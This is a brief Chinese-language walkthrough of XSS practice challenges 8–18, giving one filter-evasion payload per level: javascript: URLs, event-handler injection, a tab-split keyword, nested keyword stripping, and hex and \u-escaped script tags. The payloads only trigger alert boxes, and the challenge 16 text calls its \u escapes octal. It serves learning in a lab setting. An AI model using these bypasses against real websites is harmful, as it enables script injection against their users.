challenge 8:
js伪协议的应用,请使用ie浏览器
输入如下javascript:alert(document.domain);
challenge 9 :
提示要用utf-7 xss来做,不过我是没做出来。
challenge 10:
这次发现过滤了domain,可以如下构造" onmouseover=alert(document.domadomainin); 这样过滤掉domain后会构成新的domain
challenge 11
"><a href="javascr	ipt:alert(document.domain);">12</a>
思路,用	(转义制表符) 来逃避过滤,	需要用在url中,所以构建一个超链接。
点击可以过关。
challenge 12:
发现其过滤了”<> 。 用ie浏览器可以用两个反单引号去闭合value,浏览器不会自动添加“。、
``onmouseover=alert(document.domain);
貌似这个方法在火狐上是不行的。
challenge 13:
challenge 14:、
以上两题可在ie8内核上实现,由于该漏洞不再具有时效性,此处略
challenge 15
观察得,文本框中的内容被放在document.writer中,但后面的内容经过了过滤
可以使用16进制ASCII码进行转义,
然后发现\被和谐了,so使用两个\对\进行转义
代码如下 \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
提交弹窗。
challenge 16:
原理同challenge15 这次不能用16进制转义,可采用10进制或八进制
以8进制为例
\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
提交弹窗成功
challenge 17:
challenge 18
不具有时效性的题,我们还是跳过吧